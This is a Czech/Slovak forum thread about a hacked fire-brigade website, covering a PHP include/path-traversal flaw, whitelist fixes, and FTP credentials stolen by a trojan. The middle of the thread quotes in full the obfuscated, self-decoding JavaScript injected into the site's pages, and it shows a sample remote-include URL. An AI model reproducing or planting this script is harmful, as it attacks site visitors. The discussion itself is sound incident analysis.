Printable View
Zdárek,
mám dost velkej problém někdo nám hacknul www.sdh.velvary.com - teď otázka jak se tam dostal, mohl by se tam někdo mrknout, jestli nevidí nějakou chybu. Každopádně jediné, co bych řekl, že přes php injekci se tam nedostali ?neco=www.zlyhacker.com/osklivyskript.txt nefunguje.
uz jen tohle o necem svedci:
http://www.sdh.velvary.com/?strana=../index :D
A copak tam konkretne provedl?
hm tak to je husty, tajkze to slo udelat pres php injekci?Citace:
Původně odeslal Fox!MURDER
takze co s tim?
Jakto ze se tam vytvari ten cyklus???
Fuj, sem na to kliknul a sundalo mi to firefox:lol:.Citace:
Původně odeslal Fox!MURDER
vzdyt je tam jenom tohle?
tak jak muze vznikat to co pises? jsem asi pekna lama - prosim o vysvetleni
include("./pages/".$strana.".php");
aha uz to chapu jesm idiot - ono to tam vlozi stranku kde je znovu napsaano prave toto include("./pages/".$strana.".php"); tak se to vklada do nekonecnaCitace:
Původně odeslal bless
jj. chytra hlavicka :-)Citace:
Původně odeslal bless
vpodstate staci jen tu injekci spravne ocurat, nebo tam najit jinou podobnou chybu ...
nejjednodussi reseni tohohle problemu je udelat si jednoduchej switch
je to pracnejsi, nez jak to mas ted, ale nejde to nijak ocuratPHP kód:switch($strana)
{
case 'jednastranka':
include ('jednastranka.php'); break;
case 'druhastranka':
include('druhastranka.php); break;
default:
die("WTF?");
}
jestli ti to hackli zrovna srkz tohle ti nereknu, vzhledem k tomu, ze tam je tohle, bude asi celej kod dost prasarna, takze tech chyb a bezp. der tam 100%ne bude vicero ...
Ha pozde..
No tak kdyz si to prepises, tak ti vyjde
./pages/../index.php
takze se to koukne do pages, vyleze o slozku vejs, includuje index.php, ktery se koukne do pages, vyleze o slozku vejs, includuje index.php, ktery se koukne do pages, vyleze o slozku vejs,...
Moje prvni stranky v PHP :-) - je to videt. :-) vic der tam byt nemuze, tam snad jinek kus zdrojoveho kodu neni, bejvala tam kniha, ale uz je snad smazana.Citace:
Původně odeslal Fox!MURDER
btw ne ze bych to nejak resil na zbylych strankach. :oops:
Mnoo tem strankam se presne v jeden den vsem dopsak kus toho kodu s tim vyskakovanim ve slozce pages - vsechny ostani zustaly nedotcene. kazdopadne dikes
Mnoo jinak je v kazde strance vyskakovaci okno na PENIS enlargment - nebo tak neco, pripadne odkza na kasino. A to si nepamatuji, ze bych tam daval :)Citace:
Původně odeslal Smitka
konkretne tam vlozil tohle:
HTML kód:!-- 859bc67b9ab7ec2e5213ee82a86312ce --><script>document.write(unescape("%3Cscript%3Efunction%20nd4ska%28qk0yx9%29%7Bvar%20mdj0at%3Dnew%20String%28arguments.callee%29%3Bmdj0at%3Dmdj0at.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Crosyvr%3D0%2Cun2exd%3D0%2Cv8h4zl%3D%27%27%2Czg0zxo%3D0%3Bfor%28var%20qhmr4f%3D0%3Bqhmr4f%3Cmdj0at.length%3Bqhmr4f++%29zg0zxo+%3Dmdj0at.charCodeAt%28qhmr4f%2C1%29%3Bfor%28rosyvr%3D0%3Brosyvr%3Cqk0yx9.length%3Brosyvr++%29%7Bvar%20ox2e3o%3Dqk0yx9%5Brosyvr%5D%2Cikde49%3Dmdj0at.substr%28un2exd%2C1%29.charCodeAt%280%29%5Ezg0zxo%3Bv8h4zl+%3DString.fromCharCode%28ox2e3o%5Eikde49%29%3Bun2exd++%3Bif%28un2exd%3D%3Dmdj0at.length%29un2exd%3D0%7Ddocument.write%28v8h4zl%29%3Bv8h4zl%3D%27%27%7Dnd4ska%28new%20Array%2829994%2C30070%2C30077%2C30049%2C30061%2C30057%2C30059%2C29984%2C29971%2C29982%2C30007%2C30071%2C30057%2C30072%2C29974%2C30054%2C30005%2C29968%2C30075%2C30055%2C29981%2C29974%2C30066%2C30056%2C30066%2C30072%2C30010%2C30060%2C29965%2C30069%2C30056%2C30030%2C30052%2C29991%2C30014%2C29988%2C30052%2C30060%2C30064%2C30068%2C29964%2C30072%2C30061%2C30073%2C29997%2C30004%2C30005%2C30053%2C29988%2C30069%2C29983%2C30049%2C30001%2C30056%2C29985%2C30049%2C30077%2C29968%2C30062%2C30008%2C30010%2C29967%2C29996%2C29987%2C30010%2C29999%2C30010%2C29958%2C30078%2C30070%2C30038%2C30068%2C30068%2C30066%2C30012%2C30072%2C29998%2C30049%2C30038%2C30077%2C29976%2C30052%2C29959%2C29961%2C29953%2C30019%2C30041%2C29970%2C30001%2C30019%2C30028%2C30022%2C30043%2C30064%2C30010%2C30033%2C30032%2C30046%2C30059%2C30004%2C30008%2C30068%2C29998%2C30054%2C30071%2C30065%2C30050%2C30071%2C30055%2C30032%2C29968%2C30032%2C30003%2C30006%2C30008%2C29993%2C30068%2C30055%2C29972%2C29961%2C30071%2C30064%2C30018%2C30074%2C30003%2C30004%2C29981%2C30065%2C29964%2C29966%2C30061%2C29962%2C30057%2C30056%2C29973%2C30053%2C30073%2C30016%2C30050%2C30057%2C30007%2C30025%2C30061%2C30050%2C29967%2C30066%2C30062%2C30064%2C29996%2C30065%2C30058%2C30066%2C30070%2C29963%2C30050%2C29977%2C30065%2C30077%2C30013%2C30015%2C30020%2C30061%2C29968%2C29982%2C29975%2C30058%2C29976%2C30060%2C29969%2C30063%2C30049%2C29988%2C30000%2C30058%2C30075%2C29999%2C29996%2C30066%2C30064%2C29953%2C30071%2C30037%2C29965%2C29980%2C30062%2C30000%2C30030%2C30076%2C30053%2C30075%2C29975%2C30029%2C30053%2C30002%2C30025%2C30013%2C30068%2C29983%2C30055%2C30064%2C29995%2C29989%2C30012%2C30065%2C30071%2C30011%2C30070%2C30058%2C29969%2C30069%2C30059%2C30066%2C30058%2C30025%2C30072%2C29973%2C29952%2C29972%2C30009%2C30008%2C29996%2C29966%2C30063%2C30075%2C30063%2C30041%2C30071%2C29994%2C30025%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C30052%2C30037%2C29953%2C30052%2C30061%2C30035%2C30041%2C30072%2C29985%2C30056%2C30053%2C30053%2C30015%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C29982%2C29997%2C29976%2C30058%2C30052%2C30055%2C29989%2C30009%2C30030%2C29976%2C30057%2C29970%2C29963%2C29970%2C29961%2C30055%2C30075%2C29981%2C30051%2C30067%2C30063%2C29993%2C30012%2C29986%2C29978%2C30060%2C30069%2C30071%2C30049%2C29965%2C29958%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29966%2C29967%2C29979%2C29962%2C30061%2C30052%2C30032%2C29988%2C30058%2C29962%2C30076%2C30075%2C30010%2C29981%2C29965%2C29963%2C29979%2C30066%2C30076%2C30056%2C30027%2C30077%2C30060%2C30048%2C30068%2C30077%2C30056%2C29981%2C29956%2C30033%2C29987%2C30014%2C30061%2C29952%2C29953%2C29974%2C30077%2C30053%2C29970%2C30061%2C29955%2C29973%2C29965%2C30050%2C30070%2C29986%2C30058%2C30014%2C29994%2C30046%2C30004%2C30014%2C30070%2C30075%2C30049%2C30073%2C30076%2C30055%2C30003%2C30056%2C30077%2C30065%2C29964%2C30071%2C30005%2C30035%2C30005%2C29963%2C30074%2C30064%2C30076%2C30076%2C30049%2C30041%2C30040%2C30041%2C30051%2C30060%2C29955%2C30072%2C30061%2C30038%2C29972%2C29961%2C30077%2C30067%2C29962%2C30008%2C29998%2C30018%2C30054%2C30074%2C30071%2C29984%2C30003%2C30008%2C30016%2C30010%2C29988%2C29962%2C30068%2C30076%2C30061%2C30009%2C30051%2C30077%2C29965%2C30019%2C30060%2C29955%2C30072%2C30061%2C30017%2C30002%2C30040%2C30007%2C30010%2C29989%2C30006%2C30005%2C30012%2C29987%2C30016%2C30011%2C29997%2C30064%2C30050%2C30055%2C29977%2C30059%2C29965%2C29990%2C30022%2C30001%2C29969%2C30067%2C29967%2C30049%2C29969%2C29968%2C30072%2C30053%2C30006%2C30078%2C30014%2C30071%2C30059%2C30074%2C30058%2C30067%2C30075%2C30074%2C29968%2C29997%2C30060%2C30051%2C29969%2C30069%2C30078%2C30024%2C30074%2C29985%2C30025%2C29956%2C29963%2C29979%2C29963%2C29972%2C29981%2C30073%2C29953%2C30053%2C30055%2C30070%2C30013%2C30050%2C29994%2C30079%2C29986%2C30077%2C30065%2C30068%2C29965%2C30076%2C30055%2C30073%2C30065%2C30003%2C30050%2C30060%2C30061%2C30071%2C29979%2C30011%2C30003%2C29984%2C30068%2C30049%2C30072%2C29973%2C29987%2C29992%2C30072%2C29967%2C30069%2C30077%2C29987%2C30006%2C30010%2C30027%2C30001%2C30071%2C30046%2C29993%2C30005%2C29986%2C29984%2C30014%2C30065%2C30074%2C29980%2C30056%2C30019%2C30006%2C30031%2C29973%2C29981%2C29973%2C29973%2C30021%2C29997%2C30039%2C30044%2C29952%2C30070%2C29971%2C29982%2C30069%2C30064%2C29962%2C30060%2C30070%2C30070%2C29998%2C30067%2C30064%2C30070%2C30032%2C30078%2C30060%2C30078%2C29969%2C29980%2C30036%2C30070%2C30071%2C30058%2C30074%2C29992%2C30049%2C29967%2C29971%2C30062%2C30071%2C29959%2C30043%2C30057%2C30073%2C29957%2C30032%2C29990%2C29980%2C30064%2C29965%2C30073%2C30002%2C29983%2C30053%2C30072%2C29963%2C30051%2C30061%2C30025%2C29953%2C30074%2C30058%2C30055%2C30033%2C30013%2C29976%2C29967%2C29963%2C29969%2C29972%2C30079%2C30057%2C29980%2C30057%2C30076%2C30004%2C29968%2C29960%2C30061%2C30053%2C30072%2C30048%2C30041%2C29967%2C30078%2C30063%2C29975%2C30073%2C30005%2C29988%2C30007%2C30050%2C30061%2C30063%2C30075%2C30057%2C30059%2C29963%2C30072%2C30035%2C29973%2C29976%2C30055%2C30066%2C30028%2C29994%2C30078%2C30078%2C29975%2C30056%2C30065%2C30003%2C30061%2C29979%2C29965%2C29957%2C29982%2C29970%2C29976%2C29963%2C30053%2C30078%2C30054%2C30005%2C30069%2C30009%2C30040%2C30063%2C30077%2C30058%2C29986%2C29984%2C30071%2C29960%2C29956%2C30033%2C30015%2C29988%2C29986%2C29980%2C29996%2C30060%2C30054%2C30077%2C30034%2C30059%2C29965%2C30055%2C30007%2C30061%2C30060%2C30065%2C29986%2C30021%2C30074%2C29972%2C30060%2C29984%2C30016%2C30032%2C30075%2C30064%2C30058%2C30019%2C30061%2C30069%2C30055%2C30007%2C29994%2C29993%2C29997%2C29986%2C30019%2C30029%2C30029%2C30006%2C29985%2C30002%2C29999%2C30008%2C30027%2C29998%2C30019%2C29970%2C29963%2C29970%2C30057%2C30061%2C30055%2C29962%2C30071%2C30066%2C30054%2C30055%2C30066%2C29996%2C29983%2C30070%2C30068%2C30079%2C30076%2C29953%2C30025%2C29984%2C30004%2C30068%2C29953%2C30076%2C30049%2C30046%2C29992%2C29989%2C30000%2C30014%2C29990%2C29986%2C30035%2C29989%2C30075%2C29969%2C30070%2C30057%2C30052%2C29977%2C30025%2C29967%2C29983%2C30079%2C30061%2C30068%2C29995%2C30003%2C30004%2C30004%2C30007%2C29994%2C29988%2C29981%2C29976%2C29961%2C30051%2C30053%2C29957%2C30073%2C30005%2C30013%2C29990%2C30019%2C30008%2C29952%2C29988%2C30056%2C29972%2C30020%2C30025%2C30038%2C30026%2C30058%2C30053%2C29975%2C30072%2C30053%2C30007%2C30004%2C29992%2C30008%2C29976%2C29963%2C29978%2C29970%2C29982%2C29980%2C29957%2C30003%2C29957%2C30056%2C29980%2C29954%2C30067%2C30059%2C30078%2C30069%2C30065%2C29981%2C29984%2C29975%2C30070%2C30058%2C29955%2C30073%2C30052%2C30065%2C29983%2C30043%2C29987%2C30006%2C29982%2C30064%2C30064%2C29953%2C30049%2C30049%2C30075%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29969%2C29983%2C29975%2C29982%2C30070%2C30077%2C29965%2C30064%2C30060%2C29964%2C30005%2C29993%2C30012%2C29956%2C30075%2C30076%2C30054%2C30056%2C30072%2C30075%2C30058%2C29994%2C29981%2C30056%2C30061%2C30066%2C30061%2C30064%2C30038%2C30063%2C29958%2C30076%2C29953%2C30066%2C30035%2C29983%2C29998%2C29980%2C30064%2C29965%2C30073%2C30002%2C30069%2C30058%2C30065%2C30072%2C30061%2C30076%2C30033%2C30079%2C30067%2C30065%2C30020%2C29992%2C30011%2C30006%2C30021%2C29990%2C30011%2C30027%2C29993%2C30076%2C29953%2C29968%2C30069%2C30015%2C30049%2C30066%2C30075%2C30065%2C29961%2C30068%2C30034%2C30079%2C30073%2C30066%2C30054%2C29997%2C29986%2C29988%2C29987%2C30007%2C30037%2C29984%2C29995%2C29996%2C29960%2C29975%2C29980%2C30051%2C29992%2C29966%2C30068%2C29978%2C30070%2C30073%2C30056%2C30035%2C30055%2C29976%2C30064%2C30065%2C30031%2C30002%2C30045%2C29988%2C29991%2C30004%2C30076%2C29973%2C30079%2C30055%2C29962%2C30059%2C30074%2C30062%2C30004%2C30008%2C29982%2C29983%2C30065%2C30058%2C30064%2C29952%2C30057%2C30068%2C29983%2C29977%2C29963%2C30043%2C30059%2C29970%2C29972%2C30016%2C29983%2C30070%2C30068%2C29961%2C29972%2C29979%2C30058%2C30059%2C29995%2C30060%2C30063%2C30070%2C30051%2C30055%2C30072%2C30060%2C30075%2C30038%2C29969%2C29971%2C30065%2C30059%2C30008%2C29993%2C29963%2C29960%2C30057%2C30069%2C30071%2C30075%2C29974%2C30048%2C30074%2C30074%2C30016%2C30043%2C30062%2C29980%2C30060%2C29972%2C30000%2C30003%2C30035%2C29997%2C30007%2C30027%2C29994%2C29984%2C30007%2C29956%2C30074%2C30071%2C29986%2C30021%2C30011%2C30001%2C29989%2C29990%2C30008%2C30049%2C30078%2C30020%2C30066%2C29964%2C30057%2C30008%2C29984%2C30015%2C30020%2C30001%2C30056%2C30074%2C30078%2C29957%2C30071%2C30061%2C29968%2C30073%2C30065%2C30009%2C30014%2C29988%2C29991%2C29985%2C30060%2C30069%2C30059%2C29975%2C30008%2C29980%2C29982%2C29965%2C30040%2C30070%2C29966%2C30062%2C30043%2C30059%2C29961%2C30068%2C30074%2C30077%2C30024%2C30008%2C29988%2C30020%2C30003%2C30015%2C30006%2C29995%2C30003%2C30004%2C30004%2C30065%2C30077%2C30060%2C30038%2C30067%2C30077%2C30061%2C30062%2C29957%2C30069%2C29977%2C30017%2C30033%2C30009%2C30020%2C30044%2C29977%2C29999%2C30053%2C30003%2C29988%2C30015%2C29996%2C30029%2C30047%2C30000%2C29999%2C29998%2C29992%2C29989%2C29992%2C30005%2C29970%2C30060%2C30072%2C29957%2C29983%2C30079%2C30064%2C30014%2C30015%2C29995%2C30020%2C29996%2C30004%2C29996%2C29989%2C29985%2C29996%2C30044%2C30034%2C30041%2C29990%2C30010%2C29986%2C30013%2C29990%2C30016%2C30005%2C30024%2C30015%2C30069%2C30067%2C29961%2C30074%2C29990%2C29966%2C30055%2C30059%2C30033%2C30056%2C30056%2C30054%2C29999%2C30061%2C30057%2C30077%2C30075%2C29955%2C30017%2C30004%2C30004%2C30001%2C30016%2C30003%2C29994%2C30044%2C29987%2C29998%2C30002%2C30071%2C30060%2C30059%2C29963%2C29995%2C30070%2C29965%2C30054%2C30076%2C30004%2C30039%2C30017%2C29965%2C29974%2C30074%2C30059%2C30015%2C30066%2C30066%2C30059%2C30076%2C29998%2C29980%2C29966%2C30065%2C29981%2C30037%2C29959%2C29981%2C30057%2C30061%2C30061%2C30059%2C30036%2C29961%2C30070%2C29952%2C30041%2C30056%2C29961%2C30058%2C30058%2C30053%2C30009%2C29988%2C30007%2C29976%2C30051%2C30060%2C30076%2C30057%2C30074%2C30071%2C30079%2C29994%2C30010%2C29970%2C29982%2C29980%2C29955%2C29970%2C29954%2C30059%2C29980%2C29973%2C30078%2C30059%2C30011%2C30072%2C29992%2C30037%2C30047%2C30037%2C29989%2C30077%2C30047%2C30005%2C29999%2C29988%2C30026%2C30025%2C29994%2C29986%2C30029%2C30003%2C29993%2C30042%2C29996%2C30057%2C30070%2C30078%2C30064%2C30079%2C29958%2C30006 <!-- [ 859bc67b9ab7ec2e5213ee82a86312ce ] --><script>eval(unescape('function%20gReGf%28eGBl%29%7Bfunction%20uDI%28sPIUY%29%7Bvar%20nQBhco%3DsPIUY.length%3Bvar%20nAIOto%3D0%2Cjob%3D0%3Bwhile%28nAIOto%3CnQBhco%29%7Bjob+%3DsPIUY.charCodeAt%28nAIOto%29*nQBhco%3BnAIOto++%3B%7Dreturn%20%28%27%27+job%29%7D%20%20%20try%20%7Bvar%20bSzEp%3Deval%28%27a+r+gNuNmNeFnTtTs+.1c+aTl1lFeNe1%27.replace%28/%5BFTN1%5C+%5D/g%2C%20%27%27%29%29%2CdwsSZQ%3Dnew%20String%28%29%2CovHvnA%3D0%3BccUIE%3D0%2CvsD%3D%28new%20String%28bSzEp%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20kMZw%3DuDI%28vsD%29%3BeGBl%3Dunescape%28eGBl%29%3Bfor%28var%20wdIvfg%3D0%3B%20wdIvfg%20%3C%20%28eGBl.length%29%3B%20wdIvfg++%29%7Bvar%20jvdK%3DeGBl.charCodeAt%28wdIvfg%29%3Bvar%20mmpvph%3DvsD.charCodeAt%28ovHvnA%29%5EkMZw.charCodeAt%28ccUIE%29%3BovHvnA++%3BccUIE++%3Bif%28ovHvnA%3EvsD.length%29ovHvnA%3D0%3Bif%28ccUIE%3EkMZw.length%29ccUIE%3D0%3BdwsSZQ+%3DString.fromCharCode%28jvdK%5Emmpvph%29%3B%7Deval%28dwsSZQ%29%3B%20return%20dwsSZQ%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DgReGf%28%27%2532%2537%2534%2532%2530%2538%2539%2530%2547%2531%2535%2524%257c%257c%2504%2506%2567%2537%2520%250e%2579%2536%252b%2538%2523%252a%2530%2502%2534%2501%255b%2558%2541%2534%2530%251e%252e%2503%2517%253e%252a%251e%2524%2513%253d%2506%2502%2576%253b%2531%2576%2564%2564%250e%2531%2538%2525%2528%2518%251e%2518%256c%2546%2579%2569%253b%2529%2527%257a%2520%2578%2548%2576%2536%2535%2510%250c%251a%2528%2531%251a%254d%2516%2533%253e%2534%253b%2533%257c%251a%250c%251a%2504%2513%2551%253d%2579%2525%251a%2518%252b%257e%2534%251e%2523%253c%2518%252c%2533%2522%2536%2539%2541%2551%2571%2574%2552%257b%2556%2556%255d%2530%253f%2522%2526%255a%2524%252a%2535%2533%2536%253f%251b%2523%2515%2531%2533%256f%2570%255e%257f%255c%256d%2554%256d%256d%2525%257f%2531%253a%2503%2506%2521%2530%2512%2538%2511%257e%2556%256d%2502%2506%2572%2565%2523%253a%250b%253a%2520%2532%2527%253a%251c%257d%2523%2568%252b%2530%2535%2509%257a%252f%2527%2515%2516%2556%256c%256a%250c%2570%2536%2534%2561%2527%2503%251c%253b%254d%256c%255f%2560%2524%2577%2525%253b%2568%253b%252d%2512%2527%2574%251f%256d%252d%2573%2511%251a%2506%2561%2536%256f%2565%251a%253b%2511%2511%250d%252d%2525%2571%257f%257e%2579%2573%2570%2544%2570%252c%2572%256d%2579%256c%2548%256a%2572%2510%253c%257e%2537%2564%2578%2557%2507%2534%250d%2502%2571%257f%257d%2532%250c%2579%2576%2528%2538%2510%2507%256e%256e%2564%2559%257c%2565%2556%257e%255f%251e%252f%2516%253d%2522%2522%2579%2527%2529%2530%2520%2522%2559%2570%2570%2566%2562%252b%2520%2532%251e%2524%251b%2531%2569%2575%2523%252a%257a%253d%252b%2516%251e%2503%2524%250e%2527%2577%2502%2530%2571%257a%257d%2578%2532%2571%251e%2513%2520%2516%2530%2532%252f%2537%251a%2506%2507%2577%254a%2556%2538%256b%2535%2532%2525%251b%251e%2536%2578%257e%250a%253a%252f%2526%2569%2520%253d%253b%2579%2535%2525%2537%2528%251d%2521%2529%2528%256a%252f%2513%2574%2532%251c%253a%252a%2519%2573%253c%2532%250b%2530%2554%2564%250d%2527%2528%2504%2521%251a%254a%2555%2574%2520%2528%2523%2560%2550%2571%256e%254a%255c%2564%257c%2579%254d%2515%2510%2537%2556%2547%257c%257a%2554%2574%257b%2510%2505%2565%253f%253d%2533%2564%2545%2573%2577%2556%2503%252f%2517%257f%2538%253c%2538%253b%2520%254f%2574%2561%2543%2564%252a%2511%2560%252a%2548%2536%2531%2515%2529%2514%253d%2510%2539%2503%256e%2532%253f%253b%257f%2565%2571%2569%2543%2540%2559%2558%2522%257f%256f%252e%250f%2532%254d%2516%2525%2530%2535%2537%253d%257b%2546%2568%2577%2502%252f%2539%2574%2531%2543%2542%256f%257c%2573%2519%257b%255f%2573%2573%2557%256d%2569%252e%2532%2536%2535%2534%2537%2512%2561%254c%2541%253f%256c%2576%2562%2569%2555%2572%2574%256a%2561%2543%2549%2548%257c%254b%2567%2544%256b%2560%252d%253e%2537%2520%254f%2521%2531%2528%2505%2551%2530%2528%250d%2517%2534%2537%2535%253b%257f%2543%257c%255c%2546%2575%255e%2554%257e%257d%256d%2523%253b%251d%2528%2576%2532%2528%2507%2505%256a%254b%2569%2513%2506%252b%2520%256c%2526%2509%2506%2500%256a%2525%256b%250a%2516%251e%2514%2524%254b%2564%2506%2527%2519%252a%253d%2539%2574%2508%2528%2518%2524%2568%2569%256b%2523%2534%251c%2577%2529%2531%253f%2529%2538%253d%253d%2524%2553%2557%251b%2502%2568%252b%2527%2503%2510%2500%2572%253c%257c%2563%254f%2557%254c%2575%257b%2531%2528%2501%2523%2515%2532%2507%2511%2501%252a%2534%2514%2559%254d%256d%2539%251b%250d%2516%2528%2538%2530%2538%2550%2550%2534%2530%2539%2534%2577%2528%2570%257a%2568%2546%253e%2568%2567%2570%2514%257f%2509%2570%250d%2552%2505%2545%252d%2560%2521%256e%2525%2556%2511%2568%2515%257e%2523%2534%253f%2537%2517%253f%253e%2524%2509%2526%256f%256e%2502%2546%2548%2529%2560%252e%251a%253c%2514%2530%2519%2533%251e%2528%251e%2501%2508%2535%251d%251b%2549%251e%2529%2575%253b%2533%2574%256b%251c%255c%254a%2542%2567%2533%2520%2518%256c%2504%253a%252b%2573%2577%2562%257e%254a%252f%2552%251f%253c%253e%257a%254e%2558%2513%252b%2511%2527%256a%2503%2529%2537%253c%251e%2536%255a%2516%2538%2527%2538%254d%2524%2510%252f%2541%2532%257a%2509%253f%2525%2533%2572%2502%2500%2571%2529%256b%2572%2521%2550%253e%2509%2571%2570%257e%2577%2532%2568%2526%2571%256e%255a%2553%255c%256a%257c%2506%2514%253b%2536%2536%2539%2550%2519%2565%2538%257a%253f%252c%250c%2538%252e%2534%2501%2516%2516%2520%2533%2555%2571%256d%2525%2521%2533%2534%254a%2561%2549%2521%2575%2522%2530%251f%257d%2571%2534%250b%255a%2552%2574%2575%2532%252e%2523%2536%2518%2536%2560%256a%255b%2520%252b%2530%2525%2515%2529%2532%252c%257e%2552%2526%2517%2514%2544%253d%2520%2534%253a%2531%2555%2537%2538%2517%2516%2522%2527%252f%2530%2520%252c%2523%2517%253f%2529%253c%253b%2568%2567%2560%2523%2500%2520%2501%253a%2522%2565%257b%2577%252d%250b%2560%253b%2528%2530%2570%256e%2547%2535%2558%2507%2502%2500%2547%252b%2539%253f%2506%255c%251e%2528%257c%257c%2531%2524%2524%257c%2510%2551%250e%2547%2531%256c%2511%2560%2527%2577%256b%2562%250f%2525%251a%250f%2531%2501%2513%254c%251d%257d%252e%2578%257d%2541%2540%2505%257d%253f%250d%2534%256e%2536%2560%2515%2528%2539%2528%2524%2506%2525%2506%2528%2553%252a%255d%2561%2556%2534%2560%2548%2577%257b%251c%2530%2533%2530%2530%2530%2508%2558%255a%256b%250a%256a%251b%253c%2536%2537%2545%2572%252f%2574%253e%257f%253c%2571%256d%257f%2576%2537%2532%253f%2535%255f%2538%2539%2528%251c%2504%2537%2511%253c%250a%2512%2502%2561%2571%254e%2566%250a%257f%256f%2579%251a%2556%2553%257e%2518%253b%2538%2521%257d%2524%2562%2526%254a%250c%2515%2500%2563%256b%2537%2556%2515%255d%2564%253d%252b%2538%2509%253a%250b%2566%251d%2510%257f%2533%2539%2523%2520%2531%253c%250b%257d%254a%250a%2529%2569%2564%2526%2523%2514%2509%256d%253d%257d%2564%2576%2571%2577%254e%2502%250c%253e%2542%2502%251b%2501%2534%2541%252f%2564%2501%251f%253b%252e%253b%2526%253e%250f%2559%2502%2532%2533%252d%2532%2539%255c%2573%257a%253a%256e%2529%250b%2519%250b%2511%2575%2574%2531%2563%2530%2574%256a%252b%2507%2528%253e%2579%2575%254a%250c%2515%2525%251b%253f%250e%255e%253f%257a%252c%2537%2530%2501%2534%250a%2518%2509%251d%2538%252d%252a%2508%2534%2511%2573%2571%2569%252c%2525%2537%2535%2512%2515%257f%2531%2561%2557%2539%2564%2510%253f%2530%251a%2539%251b%2573%252f%2531%255b%252f%2565%2568%252e%253f%2527%2537%2525%2511%252e%2569%257a%251b%253b%2529%2530%2529%254f%2502%251c%257a%2539%257d%256a%2579%2559%255c%2557%2529%2551%2570%254a%257a%2542%253a%2536%256d%2576%254e%2535%2566%2515%2579%253f%2527%2548%2519%2555%257b%2569%2521%253f%252b%251d%2570%253a%257b%2569%253d%254b%2559%2573%2502%256e%2577%2531%2526%2526%2543%254c%253a%2559%257b%253e%252c%251a%256c%250c%2578%2530%2500%257d%2566%255b%256d%2577%2504%257d%253b%250a%2514%2550%2502%2567%2568%250d%2525%251b%2505%253e%2525%254f%2532%252a%2538%2524%2579%2501%250e%2522%251a%252b%257b%2504%253d%252d%2509%257f%2574%2525%251a%2538%2566%256d%2563%2542%2564%251d%2570%250d%2539%2577%2579%2568%2502%2537%257a%2528%253d%2577%2516%250c%2528%251e%251f%251b%250c%2520%2519%2538%2544%2555%250e%2523%253f%2539%2520%2536%253e%252a%2572%2518%254e%2503%2539%2526%257f%2525%257b%2565%251d%2578%253d%2518%2533%2576%250e%256e%2510%254c%2552%257a%253d%2561%2561%2510%2555%2535%2540%252d%2526%253b%2539%2528%2578%2567%256f%27%29%3B'));</script><!-- end -->
koukal jsem na to ... uprimne nejsem si prilis jistej tim, jak se jim ta injekce povedla ... jestli teda neni hacklej celej server ...Citace:
Původně odeslal bless
Jeste je celkem zajimave, ze nebyly poskozeny jine poddomeny ani hlavni, ale doufam, ze to neni otazka casu.
Koukal jsem na to taky a nechapu to?? tam totiz do toho nejde nic vlozit apostrof atd, z jineho webu tam zsoubor taky nedas...Citace:
Původně odeslal Fox!MURDER
edit: TAkze momentale jsem v situaci, kdy vubec nevim jak se branit :-/ Zrusil jsem pro jistotu vsechny loginy na ftp, ale vubec nevim. Jeste tam udelam ochranu s tim switchem, ale jinak me uz nic nenapada :-(. Doufam, ze to zabere.
mas logy ?Citace:
Původně odeslal bless
asi ano: www.log.velvary.comCitace:
Původně odeslal Fox!MURDER
no kdyz na to tak koukam, tak mi jsou asi na hovno - vzhledem k tomu ze v jedno je rok 2005 a v druhem pouze 2007 :-/
Problém vyřešen
:-( achjo...Citace:
Původně odeslal HOSTING PODPORA
Prihodim jeste pro predstavu odkaz na jeden pekny clanek z nedavne doby.
XSS (Cross-Site Scripting) hacking @ security-portal.cz
Namiesto tohoto pouzivam:Citace:
Původně odeslal Fox!MURDER
a potomPHP kód:$allowed = array('nieco1', 'nieco2', 'nieco3');
if (!in_array($co, $allowed))
$co = 'nieco1';
aleboPHP kód:readfile('texts/'.$co.'.html');
PHP kód:include_once('inc/'.$co.'.php');
Vysvětlení jak se dostali k heslu:
Moje přítulka má login(právě ten inkriminovaný), takže jsme přišli na to, že to bylo získáno z jejího počítače. Nicméně si nebyla vědoma, že by lezla někam nebo chytla nějaký spyware. Až náhle byl oběven nějakej trojskej koníček :-), kterým ji nakazil její bratr, kterému se také dostali na web už dávno. Pak se ještě jako vrchol na webovky dal skriptík...
Mnoo a tenhle skript odesílá ten soubor jak jsou v něm uložené ftp údaje z totalcommandera.
Cize klasika - najvacsi bezpecnostny problem Linux (a unix) serverov su windows, z ktorych sa tam mnohi ludia pripajaju.
jj, z toho dovodu vsetky hesla, ktore mam pod XP (vyjma putty/winscp pgp klucov) radsej pracne vypisujem...Citace:
Původně odeslal Rainbow
To si imho moc nepomuzes, staci nejaky keylogger a jsme tam, kde jsme byli. Jde o to, ze se ti tam neco dostane.Citace:
Původně odeslal PiT
Trochu bezpecnejsie to je, lebo si staci zaistit, aby v momente zadavania hesla ziadny keylogger nebezal. Pri heslach ulozenych v nejakych INI suboroch staci, aby sa na moment spustil nejaky program, ktory to niekam uploadne. Uplne idealne riesenie je nechavat to na zdielanom disku :D
Tak ono je to hlavně o uživatelích, ne o platformě, například zmíněný Total Commander důrazně varuje, že hesla se ukládají jen v plaintextu a že to není bezpečné.
Imho Rainbow spis myslel to, ze pod tucnaka moc troskych konu neexistuje (ostatne je to preci software :p)
Jinak jde opravdu jen a pouze o uzivatelich a o bezpecnosti SW ktery pouzivaji, to ze si total commander uklada hesla v plaintextu vi kazdej kdo ho na ftp pouzil, presne jak pise Peca-on-line
Jo tak s tim naprosto souhlasim - vetsinou to stejne padne kvuli uzivateli...Citace:
Původně odeslal Peca-on-line
No troufam si rict, ze kdyby linux byl rozsiren mezi "normární" :-) uzivatele, tak tam ty trojske kone jsou taky... Nicmene zatim to tak neni.Citace:
Původně odeslal Caleb
